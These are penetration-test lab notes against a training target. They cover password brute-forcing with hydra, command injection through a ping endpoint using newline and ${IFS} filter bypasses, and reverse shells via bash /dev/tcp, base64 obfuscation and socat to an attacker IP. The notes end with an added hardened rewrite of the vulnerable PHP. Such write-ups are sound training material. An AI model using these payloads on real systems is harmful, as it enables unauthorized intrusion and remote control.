### `www.monitoring.inlanefreight.local` - test login

![[images/Pasted image 20260630085152.png]]

## `monitoring.inlanefreight.local` - another login

![[images/Pasted image 20260628153132.png]]

- `admin:admin` doesn't work

![[images/Pasted image 20260630195041.png]]

### SQLi

- try SQLi

```bash
sqlmap --batch -r monitoring.inlanefreight.local.req
```

![[images/Pasted image 20260630200257.png]]

### brute force

- we know that invalid creds show: "Invalid Credentials!"
- `request:response` in burp

![[images/Pasted image 20260630200657.png]]

- view source

![[images/Pasted image 20260630200446.png]]

- use `hydra`

```bash
hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt monitoring.inlanefreight.local -f http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid Credentials!"
```

- no hits with `rockyou-50.txt`

![[images/Pasted image 20260630202132.png]]

- no hits with `/usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt`

![[images/Pasted image 20260630203620.png]]

- change payload and try some different wordlists
  - `/usr/share/seclists/Passwords/2023-200_most_used_passwords.txt`
  - `/usr/share/seclists/Passwords/Common-Credentials/xato-net-10-million-passwords-100000.txt`

```bash
hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt monitoring.inlanefreight.local -f http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid Credentials"
```

- we have a hit

![[images/Pasted image 20260630203745.png]]

## restricted shell as `inlanefreight/admin`

- logging in with the above creds drops me into a GUI-based restricted shell

![[images/Pasted image 20260630204050.png]]

- we have access to a few `.txt` files
- `help` shows what commands we have access to

![[images/Pasted image 20260630204149.png]]

- after looking at `main.js`, this is not a real CLI, just a pseudo-CLI in javascript
- with some help from gemini we find that the `connection_test` command is executing a `ping` on the backend

![[images/Pasted image 20260630205640.png]]

- try to recreate this in the browser

![[images/Pasted image 20260630210016.png]]

- `request:response` in burp

![[images/Pasted image 20260630210237.png]]

- unable to change to a POST
- garbage input works even without a real ip address

![[images/Pasted image 20260630211426.png]]

- `127.0.0.1;` is filtered but `127.0.0.1${LS_COLORS:10:1}` is not
- URL encoded new line character works > `%2a`
- can run `ls` but not `id` or `pwd`

```bash
ip=127.0.0.1%0Als
```

![[images/Pasted image 20260630213029.png]]

- try to `cat` a file

```bash
ip=127.0.0.1%0Acat${IFS}00112233_flag.txt
```

## revshell

- read `ping.php` and copy+paste into a file

```bash
ip=127.0.0.1%0Acat${IFS}ping.php
```

- contents of `ping.php`

```php
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

$output = '';

function filter($str) {
    $operators = ['&', '|', ';', '\\', '/', ' '];
    foreach ($operators as $operator) {
        if (strpos($str, $operator)) {
            return true;
        }
    }

    $words = ['whoami', 'echo', 'rm', 'mv', 'cp', 'id', 'curl', 'wget', 'cd', 'sudo', 'mkdir', 'man', 'history', 'ln', 'grep', 'pwd', 'file', 'find', 'kill', 'ps', 'uname', 'hostname', 'date', 'uptime', 'lsof', 'ifconfig', 'ipconfig', 'ip', 'tail', 'netstat', 'tar', 'apt', 'ssh', 'scp', 'less', 'more', 'awk', 'head', 'sed', 'nc', 'netcat'];
    foreach ($words as $word) {
        if (strpos($str, $word) !== false) {
            return true;
        }
    }

    return false;
}

if (isset($_GET['ip'])) {
    $ip = $_GET['ip'];
    if (filter($ip)) {
        $output = "Invalid input";
    } else {
        $cmd = "bash -c 'ping -c 1 " . $ip . "'";
        $output = shell_exec($cmd);
    }
}
?>
<?php echo $output; ?>
```

- `ping.php` filters out common operators and commands
- the revshell below will be tough because `&` and `/` are filtered

```bash
/bin/bash -i >& /dev/tcp/10.10.15.114/9001 0>&1
```

- base64 the above command, then use the below

```bash
ip=127.0.0.1%0Aexport${IFS}CMD="L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE1LjExNC85MDAxIDA+JjE="$(tr${IFS}'!-}'${IFS}'"-~'<<<:)bash<<<$(base64${IFS}-d<<<$CMD)
```

- issues here

![[images/Pasted image 20260630221929.png]]

- check for `socat` on the target

![[images/Pasted image 20260630221910.png]]

- create payload

```bash
ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:${LS_COLORS:10:1}bin${LS_COLORS:10:1}bash
```

- getting a connection that immediately closes

![[images/Pasted image 20260630222353.png]]

- modify payload

```bash
ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:bash
```

- we have a hit

![[images/Pasted image 20260630222557.png]]

- we can read logs in `/var/log` because we are in the `adm` group
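The `ping.php` above is a textbook blacklist: it strips a handful of operators and command names, but it never rejects a newline or `${IFS}`, and `strpos($str, $operator)` without `!== false` treats an operator at position 0 as "not found". The root problem is that user input is concatenated into a `bash -c` string at all. The following is an added example of how the same endpoint should be written, not code from the lab target; the function names `validate_ping_target` and `safe_ping` are hypothetical. It allowlists a bare IP literal with `filter_var(..., FILTER_VALIDATE_IP)`, so every one of the injection strings seen above fails validation, and it still quotes the argument with `escapeshellarg()` as defence in depth:

```php
<?php
// Added example (not the lab's ping.php): strict allowlist validation instead
// of a blacklist, and no user input reaches a shell parser unescaped.
// Function names are hypothetical.

// Returns the IP string when $candidate is exactly one IPv4 or IPv6 literal,
// null otherwise. filter_var() does not trim, so "127.0.0.1\nls",
// "127.0.0.1${IFS}cat", "127.0.0.1;" and " 127.0.0.1" all return null:
// none of them is a valid IP address.
function validate_ping_target(string $candidate): ?string {
    $ip = filter_var($candidate, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

// Runs a single ping against an already-validated target. escapeshellarg()
// wraps the value in single quotes and escapes embedded quotes, so even if
// validation were loosened later the argument cannot terminate the command.
// No "bash -c" wrapper: ping is invoked directly with a fixed option set.
function safe_ping(string $candidate): string {
    $ip = validate_ping_target($candidate);
    if ($ip === null) {
        return "Invalid input";
    }
    $cmd = 'ping -c 1 -W 2 ' . escapeshellarg($ip) . ' 2>&1';
    $out = shell_exec($cmd);
    // shell_exec() returns null (no output/error) or false (pipe failure).
    return is_string($out) ? $out : "ping failed";
}

if (isset($_GET['ip'])) {
    // The original echoed raw command output into the page; encode it so
    // ping output can never be interpreted as HTML by the browser.
    echo '<pre>' . htmlspecialchars(safe_ping((string) $_GET['ip']), ENT_QUOTES, 'UTF-8') . '</pre>';
}
```

The design choice is to validate the shape of the value (an IP address) rather than to enumerate bad characters: the allowlist is tiny and fully specified, so there is nothing left to bypass, and `escapeshellarg()` only has to cover mistakes in future edits. If hostnames must also be accepted, resolve them with `gethostbyname()` or `dns_get_record()` first and pass the resulting address, never the raw string, to `ping`.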